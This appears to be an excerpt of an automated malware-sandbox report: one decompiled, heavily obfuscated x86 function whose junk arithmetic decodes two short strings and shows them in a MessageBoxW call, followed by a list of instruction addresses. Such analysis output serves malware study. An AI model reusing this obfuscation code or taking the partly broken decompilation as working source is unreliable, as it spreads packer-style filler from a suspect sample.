                                              Function 00EC6023 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 604COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E00EC6023(void* __eax, signed int __ebx) {
				signed int _t323;
				signed char _t328;
				signed short _t329;
				signed int _t334;
				signed short _t359;
				signed short _t360;
				intOrPtr _t371;
				signed int _t372;
				void* _t380;
				signed int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed short _t401;
				signed int _t405;
				signed int _t411;
				intOrPtr _t412;
				signed int _t413;
				signed int _t415;
				signed int _t418;
				signed short _t419;
				void* _t421;
				void* _t424;
				void* _t430;
				WCHAR* _t433;
				signed char _t439;
				signed short _t447;
				signed short _t463;
				signed int _t473;
				signed int _t479;
				signed int _t481;
				signed short _t482;
				signed int _t488;
				signed int _t512;
				signed int _t538;
				signed short _t546;
				signed int _t548;
				signed int _t578;
				intOrPtr _t582;
				signed int _t584;
				signed int _t597;
				signed int _t601;
				signed int _t610;
				signed int _t612;
				signed int _t614;
				signed int _t629;
				signed int _t631;
				signed int _t633;
				signed int _t638;
				signed short _t639;
				signed int _t661;
				signed int _t673;
				signed int _t676;
				char _t685;
				signed int _t689;
				signed int _t698;
				signed int _t704;
				signed int _t705;
				signed int _t720;
				signed int _t722;
				signed int _t726;
				intOrPtr _t731;
				signed int _t732;
				signed int _t733;
				signed short _t736;
				signed int _t744;
				signed int _t748;
				signed int _t750;
				signed int _t753;
				signed int _t759;
				signed int _t770;
				WCHAR* _t771;
				signed int _t779;
				signed int _t780;
				signed int _t790;
				signed int _t801;
				signed int _t804;
				signed int _t805;
				signed int _t808;
				signed int _t835;
				signed int _t850;
				signed int _t854;
				intOrPtr _t860;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				void* _t869;
				void* _t876;
				void* _t877;
				signed int _t882;
				void* _t889;
				void* _t890;
				void* _t891;
				void* _t911;

				_t538 = __ebx;
				_t698 =  *0x1215420;
				 *(_t869 - 0x20) = _t698;
				 *(_t869 - 0xb4) =  *(_t869 - 0x20) + 0x276;
				if( *0x1000c9b != 0 || ( *0x1000c83 & 0x000000ff) >  *(_t869 - 0x90)) {
					__eflags =  *(_t869 - 0xc) -  *(_t869 - 5);
					if( *(_t869 - 0xc) <=  *(_t869 - 5)) {
						_t546 = 0;
						__eflags = 0;
					} else {
						_t546 = 1;
					}
					asm("cdq");
					asm("adc edx, [0x1000d14]");
					__eflags = ( *0x1000c98 & 0x0000ffff) +  *0x1000d10 - _t546;
					if(( *0x1000c98 & 0x0000ffff) +  *0x1000d10 != _t546) {
						L14:
						_t323 = 0;
						__eflags = 0;
					} else {
						__eflags = _t698;
						if(_t698 != 0) {
							goto L14;
						} else {
							_t323 = 1;
						}
					}
					__eflags =  *0x1000cf8 - _t538;
					 *(_t869 - 0xa8) = _t538;
					_t548 = 0 |  *0x1000cf8 == _t538;
					__eflags = _t548 -  *(_t869 - 0x28);
					asm("sbb ecx, ecx");
					__eflags = ( *(_t869 - 3) & 0x000000ff) - _t548 + 1;
					__eflags = _t323 - (0 | ( *(_t869 - 3) & 0x000000ff) - _t548 + 0x00000001 < 0x00000000);
					_t538 =  *(_t869 - 0xa8);
					if(__eflags != 0) {
						__eflags =  *(_t869 - 0x8c);
						_t704 =  *(_t869 - 0x8c) - (0 |  *(_t869 - 0x8c) == 0x00000000);
						__eflags = _t704;
						if(__eflags != 0) {
							 *0x1000ca0 =  *0x1215420;
							asm("cdq");
							 *0x1000cbc = _t704;
							_t704 =  *0x1000ce8;
							_t689 = ( *(_t869 - 0xe) & 0x000000ff) * _t704;
							__eflags = _t689;
							 *0x1000cb8 =  *0x1000c9a - 0x20f4;
							 *(_t869 - 0xe) = _t689;
						}
					} else {
						 *(_t869 - 0x18) =  *0x1000ca4 - ( *(_t869 - 0xb) & 0xff);
						asm("cdq");
						 *0x1000cf0 =  *0x1000cf0 - ( *(_t869 - 9) & 0x000000ff);
						asm("sbb [0x1000cf4], edx");
						_t704 =  *(_t869 - 0x64);
						 *0x1000c94 =  *(_t869 - 0x68) + 0xbfc4;
						 *(_t869 - 0x6c) = ( *(_t869 - 0xa) & 0xff) * 0x9564;
					}
				} else {
					 *(_t869 - 0x28) =  *0x1000cd2 + 0xd71b;
					 *(_t869 - 0x24) =  *(_t869 - 0x24) - 1;
					 *(_t869 - 0xb) = ( *(_t869 - 0xb) & 0x000000ff) +  *0x1000c9e - ( *(_t869 - 0xb) & 0xff);
					_t704 = ( *(_t869 - 5) & 0x000000ff) + ( *(_t869 - 5) & 0x000000ff &  *0x1000cd8);
					 *(_t869 - 5) = _t704;
				}
				 *(_t869 - 0xac) =  *(_t869 - 0x20) + 0x2e4;
				_t328 =  *(_t869 - 1);
				asm("cdq");
				_t876 = _t328 -  *0x1000d10; // 0x0
				if(_t876 != 0) {
					L21:
					_t329 = 1;
				} else {
					_t877 = _t704 -  *0x1000d14; // 0x0
					if(_t877 == 0) {
						_t329 = 0;
						__eflags = 0;
					} else {
						goto L21;
					}
				}
				_t705 =  *(_t869 - 1);
				if(_t329 > (0 | _t705 != 0x00000030)) {
					asm("cdq");
					asm("sbb esi, edx");
					asm("cdq");
					__eflags =  *0x1000d10 - ( *(_t869 - 0x18) & 0x0000ffff) |  *0x1000c84 |  *0x1000d14 | _t705;
					if(__eflags != 0) {
						 *(_t869 - 0x1c) =  *(_t869 - 0x38) *  *(_t869 - 0x1c);
						 *(_t869 - 0x28) = 0x3090bb2d;
						_t835 =  *(_t869 - 1) + 0x23;
						__eflags = _t835;
						 *0x1000c9a = _t835;
						 *(_t869 - 0x40) = E00ECEE50( *(_t869 - 0x38),  *(_t869 - 0x34), 0x7d, _t538);
						 *(_t869 - 0x3c) = _t835;
					}
				} else {
					 *0x1000c9f = TlsGetValue( *(_t869 - 0x60));
				}
				 *(_t869 - 0xb8) =  *(_t869 - 0x20) + 0x2bc;
				 *(_t869 - 0x20) =  *0x1215420;
				 *0x1000cd0 = 0xfffff41d;
				 *0x1000cd8 = (1 -  *0x1000d18) *  *0x1000cd8;
				_t334 =  *0x1000cb8; // 0x4
				 *0x1000c94 =  *(_t869 - 0x38) * 0xdcf2d26f;
				 *(_t869 - 0x90) = _t334 & 0x00000006;
				 *(_t869 - 0x14) =  *(_t869 - 0x20) + 0x3b1;
				if( *(_t869 - 0x7c) == 0) {
					__eflags =  *0x1000ca8 |  *0x1000cac;
					if(__eflags != 0) {
						__eflags =  !( *0x1000d10) |  !( *0x1000d14);
						if(__eflags != 0) {
							 *0x1000ca4 =  *0x1000ca4 - 1;
							asm("adc ecx, [0x1000cbc]");
							 *(_t869 - 0x38) =  *(_t869 - 0x38) +  *0x1000cb8 + 0xd0056b0c;
							asm("adc ecx, 0xfff005d1");
							asm("adc eax, 0xfff765fd");
							 *0x1000ce4 =  *0x1000d04;
							 *0x1000ce0 =  *0x1000d00 + 0x1e29880a;
							asm("cdq");
							 *(_t869 - 0x38) =  *(_t869 - 0x38) -  *(_t869 - 1) + 0x10;
							asm("sbb [ebp-0x34], edx");
							_t673 = ( *(_t869 - 0xa0) +  *(_t869 - 0x18) + 2) * 0x6a +  *0x1000c98 * 0x41;
							__eflags = _t673;
							 *0x1000c83 = _t673;
						}
					} else {
						 *0x1000ca4 = ( *(_t869 - 0x68) +  *0x1000ca4) *  *0x1000ca4;
						 *(_t869 - 0x30) =  *(_t869 - 0x30) -  *(_t869 - 0x40);
						 *(_t869 - 0x24) =  *0x1000c84 + 0x6491;
					}
				} else {
					if( *(_t869 - 0x6c) != 0) {
						_t512 =  *0x1000ce0; // 0x0
						_t676 =  *0x1000ce4; // 0x0
						_t882 = _t512 ^  *0x1000d18 | _t676 ^  *0x1000d1c;
						if(_t882 == 0) {
							 *0x1000c84 = 0x78;
							 *0x1000cc8 =  *0x1000ca8 & 0x430b161a;
							 *0x1000ccc = _t538;
							 *(_t869 - 3) =  *0x1215420;
							 *(_t869 - 0x70) =  *0x1000cb4 << 4;
						} else {
							 *0x1000c88 =  *0x1000c9f + 0x60ad17c2 ^  *0x1000c94;
							_t685 =  *0x1000c9c; // -44
							 *0x1000c8c = _t538;
							 *((char*)(_t869 - 4)) =  *(_t869 - 0xd) & 0xffffff00 | _t882 == 0x00000000;
							 *(_t869 - 0x4c) = ( *0x1000c98 & 0x0000ffff) + 0x73bfbdfe;
							 *0x113d808 = _t685;
						}
					}
				}
				 *((intOrPtr*)(_t869 - 0xa4)) =  *(_t869 - 0x20) + 0x241;
				 *(_t869 - 0xc4) =  *(_t869 - 0x20) + 0x273;
				 *(_t869 - 0x20) =  *0x1215420;
				 *(_t869 - 6) = E00EC1000();
				asm("sbb ecx, ecx");
				asm("sbb edx, edx");
				if(( *(_t869 - 6) & 0x000000ff) + 1 >  *((intOrPtr*)(_t869 - 4)) + 1) {
					asm("cdq");
					 *0x1000ce0 =  *0x1000ce0;
					asm("sbb [0x1000ce4], edx");
					 *(_t869 - 0x18) =  *(_t869 - 0x70) - 0x23c803e3;
					 *(_t869 - 0x28) =  *0x1215420;
					 *0x1000cd2 = 0 - ( *(_t869 - 0xa0) ^ 0);
					 *0x1000cd8 = ( *(_t869 - 8) & 0xff) +  *(_t869 - 0x6c) + 1;
				}
				 *(_t869 - 0xa8) =  *(_t869 - 0x20) + 0x83;
				_t887 =  *(_t869 - 0xa0) |  *(_t869 - 0x9c);
				if(( *(_t869 - 0xa0) |  *(_t869 - 0x9c)) == 0) {
					asm("sbb eax, eax");
					asm("cdq");
					_t720 =  *(_t869 - 0x30) & 0x0000ffff;
					asm("cdq");
					asm("sbb edx, ebx");
					 *0x1000d18 = E00ECEE50(( ~( *(_t869 - 0x28)) + 1) * ( *(_t869 - 0x1c) & 0x0000ffff),  *(_t869 - 0x1c) & 0x0000ffff, _t720 -  *(_t869 - 0x48), _t720);
					 *0x1000d1c = _t720;
					 *0x1000cd8 = ( *0x1000c9b & 0x000000ff) - 0x23e5;
					_t538 = 0;
					__eflags = 0;
				} else {
					 *(_t869 - 0x4c) = E00EC1370(_t887) & 0x000000ff;
					_t805 =  *(_t869 - 0x4c);
					if(_t805 <= 0) {
						_t479 =  *0x1000cac; // 0x106b42
						_t889 = _t479 -  *0x1000c8c; // 0xfff500a5
						if(_t889 > 0) {
							L44:
							_t481 =  *(_t869 - 0xa) & 0x000000ff;
							asm("cdq");
							__eflags = _t805 -  *0x1000d14;
							if(__eflags < 0) {
								L48:
								_t482 = 0;
								__eflags = 0;
							} else {
								if(__eflags > 0) {
									L47:
									_t482 = 1;
								} else {
									__eflags = _t481 -  *0x1000d10;
									if(_t481 <=  *0x1000d10) {
										goto L48;
									} else {
										goto L47;
									}
								}
							}
							 *(_t869 - 8) =  *0x1000c90 - ( *(_t869 - 8) == 0);
							__eflags = _t482 - ( *0x1000c90 ==  *(_t869 - 8) == 0);
							if(_t482 <= ( *0x1000c90 ==  *(_t869 - 8) == 0)) {
								_t808 =  *0x1215420;
								 *(_t869 - 0x80) = _t808;
								asm("cdq");
								asm("cdq");
								_t488 = E00ECEE50(E00ECEE50( *(_t869 - 0x24), _t808, ( *0x1000cd4 & 0x0000ffff) + 0x43, _t808), _t808,  *0x1000d18,  *0x1000d1c);
								 *0x1000ce4 = _t808;
								 *0x1000ce0 = _t488;
								 *(_t869 - 0x88) = (( *(_t869 - 3) & 0x000000ff) - ( *(_t869 - 6) & 0x000000ff)) *  *0x1000d18;
								 *(_t869 - 0x2c) = ( *(_t869 - 0x84) & 0x0000ffff) - 0x86;
							}
						} else {
							if(_t889 < 0) {
								L43:
								 *(_t869 - 2) =  *(_t869 - 0x80) - 0x6b;
							} else {
								_t661 =  *0x1000ca8; // 0x7b8b5249
								_t890 = _t661 -  *0x1000c88; // 0xa666078f
								if(_t890 > 0) {
									goto L44;
								} else {
									goto L43;
								}
							}
						}
					}
				}
				_t722 =  *(_t869 - 0x20) + 0x373;
				 *(_t869 - 0xb8) = _t722;
				_t860 =  *((intOrPtr*)(_t869 - 0x58));
				_t359 =  *(_t869 - 0x30);
				asm("cdq");
				_t891 = _t722 -  *((intOrPtr*)(_t869 - 0x54));
				if(_t891 > 0 || _t891 >= 0 && _t359 > _t860) {
					_t360 = 0;
					__eflags = 0;
				} else {
					_t360 = 1;
				}
				_t724 = 0 |  *(_t869 - 0x30) - 0x00000054 <= 0x00000000;
				if(_t360 <  *(_t869 - 0x30) - 0x54 <= 0) {
					 *(_t869 - 9) =  *0x1000cd0;
					 *0x1000ca4 =  *0x1000cb4;
				} else {
					asm("cdq");
					 *(_t869 - 0x48) =  *(_t869 - 0x48) - E00ECEE50( *(_t869 - 0x48),  *((intOrPtr*)(_t869 - 0x44)),  *0x1000c9c, _t724);
					asm("sbb [ebp-0x44], edx");
					 *(_t869 - 0xc) = 0x53;
					_t804 =  *(_t869 - 0x24);
					asm("cdq");
					 *0x1000cc0 = _t804 - 0xff34;
					asm("ror byte [eax+eax], 0x1");
					 *0x1000cc4 = _t804;
				}
				_t726 =  *(_t869 - 0x20) + 0x117;
				 *(_t869 - 0xb8) = _t726;
				 *0x1000ca4 = E00EC1700();
				asm("cdq");
				asm("adc edx, 0xcae43");
				if(( !( *0x1000c9f) + 0x0dc8da25 | _t726) != 0) {
				}
				if( *(_t869 - 0xa8) != 0x3b0) {
					 *(_t869 - 0x6c) =  *(_t869 - 0x6c) &  *0x1109ef0;
					 *(_t869 - 0x88) =  *(_t869 - 0x88) -  *(_t869 - 0x78) &  *(_t869 - 0x88);
					 *((char*)(_t869 - 0xfc)) = 0x97;
					 *((char*)(_t869 - 0xfb)) = 0xaf;
					 *((char*)(_t869 - 0xfa)) = 0xb7;
					 *((char*)(_t869 - 0xf9)) = 0xb9;
					 *((char*)(_t869 - 0xf8)) = 0xbc;
					 *((char*)(_t869 - 0xf7)) = 0xc3;
					 *((char*)(_t869 - 0xf6)) = 0x6a;
					 *((char*)(_t869 - 0xf5)) = 0xb0;
					 *((char*)(_t869 - 0xf4)) = 0xab;
					 *((char*)(_t869 - 0xf3)) = 0xbf;
					 *((char*)(_t869 - 0xf2)) = 0xb6;
					 *((char*)(_t869 - 0xf1)) = 0xbe;
					_t862 = 0;
					do {
						_t578 =  *0x1000cc0; // 0xffff970a
						if((_t578 |  *0x1000cc4) == 0) {
							_t731 =  *((intOrPtr*)(_t869 - 7));
							_t371 = _t731;
							asm("cdq");
							__eflags =  *0x1000cbc - _t731;
							if(__eflags < 0) {
								L73:
								_t372 = 0;
								__eflags = 0;
							} else {
								if(__eflags > 0) {
									L72:
									_t372 = 1;
								} else {
									__eflags =  *0x1000cb8 - _t371;
									if( *0x1000cb8 <= _t371) {
										goto L73;
									} else {
										goto L72;
									}
								}
							}
							__eflags =  !_t372;
							if( !_t372 == 0) {
								__eflags =  *0x1000ce0 |  *0x1000ce4;
								if(( *0x1000ce0 |  *0x1000ce4) != 0) {
									_t801 =  *(_t869 - 0x70) &  *0x1000ce0;
									 *0x1000ce0 = E00ECEE50(_t801, 0 &  *0x1000ce4,  *0x1000ce0,  *0x1000ce4);
									 *0x1000ce4 = _t801;
									 *0x1000cd8 =  *(_t869 - 0x40) * 0xffffe4ed;
									_t473 =  *0x1000d20 & 0xffffb755;
									__eflags = _t473;
									 *(_t869 - 0x5c) = _t473;
								}
							} else {
								 *0x1000c84 =  *0x1000c84 + 1;
							}
						} else {
							 *0x1000c84 = 0x9b;
							 *(_t869 - 8) = 1;
						}
						_t732 =  *0x1000d08;
						_t582 =  *0x1000cf4; // 0x2b91c
						asm("cdq");
						_t733 =  *0x1000cf0; // 0xd43579fe
						 *(_t869 - 0xa8) = _t732;
						_t380 = E00ECEE50(_t733, _t582, 0x1faed387, _t538);
						asm("sbb edx, edi");
						_t538 = 0;
						 *0x1000cf4 = 0;
						 *0x1000cf0 = 1;
						if((_t380 -  !( *(_t869 - 2) ^ _t732) | _t733) != 0) {
							 *0x1000cf0 = 0;
						}
						_t584 =  *0x1000ca4; // 0x9b27
						 *0x1000c90 = 0xb8f675f1 - ( *(_t869 - 1) & 0x000000ff);
						_t736 =  *0x1000cdc; // 0x84521e70
						_t862 = _t862 + 1;
						 *0x1000d10 = ( *(_t869 - 1) & 0x000000ff) *  *(_t869 - 0x6c) * ( *0x1000d08 - (0 | ( *(_t869 - 0x24) & 0x0000ffff) == 0x00000000)) * ((( *0x1000c83 & 0x000000ff) + 1) *  *0x1000cb4 +  !(_t584 + _t736));
						 *(_t869 + _t862 * 2 - 0x1ae) = ( *(_t869 + _t862 - 0xfd) & 0x000000ff) - 0x0000004a & 0x000000ff;
						 *0x1000d14 = _t538;
					} while (_t862 < 0xc);
					_t744 = 0x92 - ( *(_t869 - 0xac) ^  *(_t869 - 0xb4));
					_t392 = M01000CB0; // 0x0
					 *(_t869 - 0x194) = _t744;
					 *0x1000cc0 = 2;
					 *0x1000cc4 = _t538;
					_t393 = E00ECEE50(_t392, _t538, 0xbe790e28, 0x61b36);
					 *0x1000d1c = _t744;
					 *0x1000d18 = _t393;
					_t395 =  *0x1000cc0; // 0xffff970a
					_t597 =  *0x1000cc4; // 0xffffffff
					 *0x1000c94 =  *(_t869 - 0x1c) +  *(_t869 - 1) + 1;
					_t748 = _t395 | _t597;
					if(_t748 == 0) {
						_t750 = 1 -  *(_t869 - 0x78);
						asm("sbb eax, ecx");
						_t398 = E00ECEE50(_t750, 0,  *0x1000ca8,  *0x1000cac);
						 *0x1000cac = _t750;
						_t748 =  *0x1000c83 & 0x000000ff;
						M01000CB0 = M01000CB0 ^ _t748;
						__eflags = M01000CB0;
						 *0x1000ca8 = _t398;
					} else {
						if(_t395 != 1 || _t597 != _t538) {
							if(_t395 == 2 && _t597 == _t538) {
								 *(_t869 - 0xbc) = _t538;
								if( *(_t869 - 0x24) != 0) {
									_t639 = 0;
									__eflags = 0;
								} else {
									_t639 = 1;
								}
								 *(_t869 - 0xbc) = _t538;
								if( *(_t869 - 0xb) != 0) {
									_t463 = 0;
									__eflags = 0;
								} else {
									_t463 = 1;
								}
								 *(_t869 - 0x18) = ( *(_t869 - 0x78) - _t639) *  *0x1000d10 * _t463;
								asm("cdq");
								asm("sbb esi, edx");
								_t748 =  *(_t869 - 0x48);
								asm("sbb esi, eax");
								 *(_t869 - 0x48) =  *(_t869 - 0x48) -  *((intOrPtr*)(_t869 - 7)) - _t748;
							}
						} else {
							 *0x1000d18 =  *0x1215420;
							 *0x1000d1c = _t538;
							 *(_t869 - 2) =  *(_t869 - 2) & 0x000000ff &  *(_t869 - 0x80) & 0x0000ffff |  *(_t869 - 2) & 0x000000ff;
							_t748 =  *0x10ae26c;
							 *0x1000d20 =  *0x1000d20 | _t748;
						}
					}
					 *((char*)(_t869 - 0xdc)) = 0xe5;
					 *((char*)(_t869 - 0xdb)) = 0xdd;
					 *((char*)(_t869 - 0xda)) = 0xe5;
					 *((char*)(_t869 - 0xd9)) = 0xe7;
					 *((char*)(_t869 - 0xd8)) = 0xea;
					 *((char*)(_t869 - 0xd7)) = 0xf1;
					_t401 = E00EC1190() & 0x000000ff;
					 *0x1000cd8 = _t401;
					if(_t401 > _t538) {
						asm("cdq");
						 *0x1000d1c = _t538;
						asm("adc edx, [0x1000cbc]");
						 *0x1000cc0 =  !(( *0x1000c83 & 0x000000ff) +  *0x1000cb8);
						 *0x1000cc4 =  !_t748;
						 *0x1000d18 =  *0x1215420;
						 *((intOrPtr*)(_t869 - 0x58)) =  *((intOrPtr*)(_t869 - 0x58)) + 1;
						asm("adc [ebp-0x54], ebx");
					}
					_t601 =  *(_t869 - 0x40);
					 *(_t869 - 0x38) = _t601 + _t601 + _t601 + _t601 + _t601 + _t601 + _t601 + _t601;
					 *(_t869 - 0x34) = ( *(_t869 - 0x3c) << 0x00000020 | _t601) << 3;
					 *0x10ae368 =  *(_t869 - 0x38);
					_t863 = 0;
					do {
						_t753 =  *(_t869 - 0xb);
						_t911 =  *0x1000c9b - _t753; // -28
						if(_t911 >= 0) {
							if( *(_t869 - 1) == 0) {
								_t405 =  *(_t869 - 0x6c);
								_t850 =  *(_t869 - 0x34);
								asm("cdq");
								__eflags = _t405 -  *(_t869 - 0x38);
								if(_t405 !=  *(_t869 - 0x38)) {
									L103:
									 *(_t869 - 0x90) =  *(_t869 - 0x40) +  *0x1000d10 +  *0x1000c84 -  *(_t869 - 1);
									 *(_t869 - 0x2c) =  *(_t869 - 0x2c) - ( *(_t869 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
									 *0x1000ca0 =  *0x1000ca0 +  *(_t869 - 0x7c);
									 *0x1000c9e =  *0x1215420;
									 *0x1000c88 =  *0x1000c88 -  *(_t869 - 0x40);
									asm("sbb [0x1000c8c], eax");
								} else {
									__eflags = _t753 - _t850;
									if(_t753 == _t850) {
										_t631 =  *0x1000c88 |  *0x1000c8c;
										__eflags = _t631;
										 *_t631 =  *_t631 + _t405;
										__eflags =  *_t631;
										if( *_t631 != 0) {
											_t854 =  *(_t869 - 0x74);
											_t411 =  *0x1000c83 & 0x000000ff;
											asm("cdq");
											_t633 =  *(_t869 - 0x78) - _t411;
											__eflags = _t633;
											asm("enter 0xfa1b, 0x8b");
											_push(_t869);
											 *0x3DE8FE44 = _t633;
											 *(_t869 - 0x78) = _t633;
											 *(_t869 - 0x74) = _t854 & _t411;
											 *(_t869 - 0xa) = ( *(_t869 - 0xa) & 0x000000ff) + ( *(_t869 - 0x18) & 0x0000ffff);
											_t412 =  *((intOrPtr*)(_t869 - 4));
											 *0x1000cf0 = 0x73c571ff;
											_t638 = _t412 +  *0x1000cc8 + 1;
											__eflags = _t638;
											 *0x1000cd4 = _t638;
											 *0x1000cf4 = 0;
											_t413 = _t412 + 0x1000cf4;
											__eflags = _t413;
											 *_t638 =  *_t638 + _t413;
											 *_t413 =  *_t413 + _t413;
											 *_t413 =  *_t413 + _t413;
											__eflags =  *_t413;
										}
									} else {
										goto L103;
									}
								}
							} else {
								_t629 =  *0x1000d04; // 0xffffffff
								asm("cdq");
								_t415 =  *0x1000d00; // 0xfffff835
								_t790 = _t753 & _t629;
								 *0x1000d00 = E00ECEE50( *(_t869 - 0x1c) & _t415, _t790, _t415, _t629);
								 *0x1000d04 = _t790;
							}
						}
						 *(_t869 + _t863 * 2 - 0x160) = ( *(_t869 + _t863 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
						_t863 = _t863 + 1;
					} while (_t863 < 6);
					_t610 =  *0x1000d00; // 0xfffff835
					 *0x1000ce0 = 2;
					 *0x1000ce4 = 0;
					 *(_t869 - 0x70) = _t610 * 0x6eb594ba;
					_t612 =  *0x1000ce4; // 0x0
					 *0x110030c =  *(_t869 - 0x60);
					_t418 =  *0x1000ce0; // 0x0
					_t759 = _t418 | _t612;
					if(_t759 == 0) {
						 *(_t869 - 0xbc) = 0;
						__eflags =  *(_t869 - 6);
						if( *(_t869 - 6) != 0) {
							_t419 = 0;
							__eflags = 0;
						} else {
							_t419 = 1;
						}
						_t614 =  *0x1000d00 + _t419;
						__eflags = _t614;
						 *(_t869 - 0x24) =  !_t614;
					} else {
						if(_t418 != 1 || _t612 != 0) {
							if(_t418 == 2 && _t612 == 0) {
								_t447 =  *0x1000cdc; // 0x84521e70
								 *(_t869 - 0x60) = ( *(_t869 - 0x68) ^ _t447 ^  *0x1000d00) * (_t447 + 0xffffbb58);
								_t779 =  *0x1000c94; // 0x0
								_t780 = _t779 * 0x2d40daef;
								 *(_t869 - 0x7c) =  *(_t869 - 0x7c) * ( *0x1000cec & 0x0000ffff);
								 *(_t869 - 0x90) = _t780;
								asm("cdq");
								 *(_t869 - 0x38) = ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff);
								 *(_t869 - 0x34) = _t780;
							}
						} else {
							asm("cdq");
							 *0x1000cb8 =  *((intOrPtr*)(_t869 - 4)) - 0x4fef3c23;
							 *0x1000cbc = _t759;
							 *(_t869 - 0x4c) =  *0x1215420;
							 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
						}
					}
					 *((short*)(_t869 - 0x154)) =  ~(( *(_t869 - 0xc4) +  *((intOrPtr*)(_t869 - 0xa4))) *  *(_t869 - 0xc4) *  *(_t869 - 0x14) ^ 0x0000701c);
					_t421 = 0x20b;
					do {
						 *(_t869 - 0xb) =  *(_t869 - 0xb) + 1;
						_t421 = _t421 - 1;
					} while (_t421 > 0);
					_t424 = ( *(_t869 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
					 *0x1000c84 = 0;
					if(_t424 != 0) {
						_t864 = 0;
						__eflags = 0;
					} else {
						_t301 = _t424 + 1; // 0x20b
						_t864 = _t301;
					}
					asm("cdq");
					_t770 =  *(_t869 - 0x2c);
					asm("cdq");
					asm("adc edx, [0x1000cc4]");
					_t430 = E00ECEE50(( *(_t869 - 0x18) & 0x0000ffff) + ( *(_t869 - 0xc) & 0x000000ff) + 1,  *(_t869 - 0xc), _t770 +  *0x1000cc0, _t770);
					asm("sbb edx, edi");
					 *0x1000c83 = 1;
					if((_t430 - _t864 | _t770) != 0) {
						 *0x1000c83 = 0;
					}
					if( *0x1000c84 == 0) {
						 *(_t869 - 0x24) = 0x83;
						asm("cdq");
						 *0x1000cc8 = ( *(_t869 - 0x18) & 0x0000ffff) + 0xf;
						_t439 =  *0x1000cd0; // 0x0
						 *0x1000ccc = _t770;
						 *(_t869 - 5) =  *(_t869 - 3) +  *(_t869 - 0x28) + (_t439 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
						asm("cdq");
						 *(_t869 - 0xa0) =  *(_t869 - 0xa0) -  *0x1000cd0 - 0x3811;
						asm("sbb [ebp-0x9c], edx");
					}
					_t314 = _t869 - 0x160; // 0x60f1ba1c
					_t771 = _t314;
					_t315 = _t869 - 0x1ac; // 0x60f1b9d0
					_t433 = _t315;
					MessageBoxW(GetForegroundWindow(), _t433, _t771, 0x10);
				}
				return 0;
			}

































































































                                              0x00ec6023
                                              0x00ec60b4
                                              0x00ec60ba
                                              0x00ec60cc
                                              0x00ec60d2
                                              0x00ec6132
                                              0x00ec6134
                                              0x00ec613d
                                              0x00ec613d
                                              0x00ec6136
                                              0x00ec6136
                                              0x00ec6136
                                              0x00ec6146
                                              0x00ec614f
                                              0x00ec6155
                                              0x00ec6157
                                              0x00ec6162
                                              0x00ec6162
                                              0x00ec6162
                                              0x00ec6159
                                              0x00ec6159
                                              0x00ec615b
                                              0x00000000
                                              0x00ec615d
                                              0x00ec615d
                                              0x00ec615d
                                              0x00ec615b
                                              0x00ec6169
                                              0x00ec6170
                                              0x00ec6176
                                              0x00ec6179
                                              0x00ec617e
                                              0x00ec6186
                                              0x00ec618b
                                              0x00ec618d
                                              0x00ec6193
                                              0x00ec61f0
                                              0x00ec61f9
                                              0x00ec61f9
                                              0x00ec61fb
                                              0x00ec6206
                                              0x00ec6217
                                              0x00ec6218
                                              0x00ec621e
                                              0x00ec6224
                                              0x00ec6224
                                              0x00ec6227
                                              0x00ec622c
                                              0x00ec622c
                                              0x00ec6195
                                              0x00ec61a4
                                              0x00ec61b2
                                              0x00ec61b3
                                              0x00ec61b9
                                              0x00ec61bf
                                              0x00ec61cc
                                              0x00ec61db
                                              0x00ec61db
                                              0x00ec60e5
                                              0x00ec60f2
                                              0x00ec60f5
                                              0x00ec610e
                                              0x00ec6122
                                              0x00ec6124
                                              0x00ec6124
                                              0x00ec6237
                                              0x00ec6240
                                              0x00ec6243
                                              0x00ec6244
                                              0x00ec624a
                                              0x00ec6254
                                              0x00ec6254
                                              0x00ec624c
                                              0x00ec624c
                                              0x00ec6252
                                              0x00ec625b
                                              0x00ec625b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6252
                                              0x00ec625d
                                              0x00ec626a
                                              0x00ec6294
                                              0x00ec629c
                                              0x00ec629e
                                              0x00ec62a3
                                              0x00ec62a5
                                              0x00ec62b5
                                              0x00ec62b9
                                              0x00ec62cd
                                              0x00ec62cd
                                              0x00ec62d1
                                              0x00ec62dc
                                              0x00ec62df
                                              0x00ec62df
                                              0x00ec626c
                                              0x00ec627a
                                              0x00ec627a
                                              0x00ec62f0
                                              0x00ec62f6
                                              0x00ec6313
                                              0x00ec6323
                                              0x00ec632d
                                              0x00ec6332
                                              0x00ec633b
                                              0x00ec634a
                                              0x00ec6352
                                              0x00ec6415
                                              0x00ec641b
                                              0x00ec6463
                                              0x00ec6465
                                              0x00ec6471
                                              0x00ec6483
                                              0x00ec648e
                                              0x00ec6496
                                              0x00ec64a2
                                              0x00ec64a7
                                              0x00ec64b8
                                              0x00ec64be
                                              0x00ec64bf
                                              0x00ec64c2
                                              0x00ec64e8
                                              0x00ec64e8
                                              0x00ec64ea
                                              0x00ec64ea
                                              0x00ec641d
                                              0x00ec6435
                                              0x00ec643b
                                              0x00ec644b
                                              0x00ec644b
                                              0x00ec6358
                                              0x00ec635d
                                              0x00ec6363
                                              0x00ec6368
                                              0x00ec637a
                                              0x00ec637c
                                              0x00ec63eb
                                              0x00ec63f5
                                              0x00ec63fb
                                              0x00ec6404
                                              0x00ec6407
                                              0x00ec637e
                                              0x00ec639d
                                              0x00ec63af
                                              0x00ec63b8
                                              0x00ec63c3
                                              0x00ec63c6
                                              0x00ec63c9
                                              0x00ec63c9
                                              0x00ec637c
                                              0x00ec635d
                                              0x00ec64f8
                                              0x00ec650d
                                              0x00ec6513
                                              0x00ec6521
                                              0x00ec6530
                                              0x00ec6537
                                              0x00ec653c
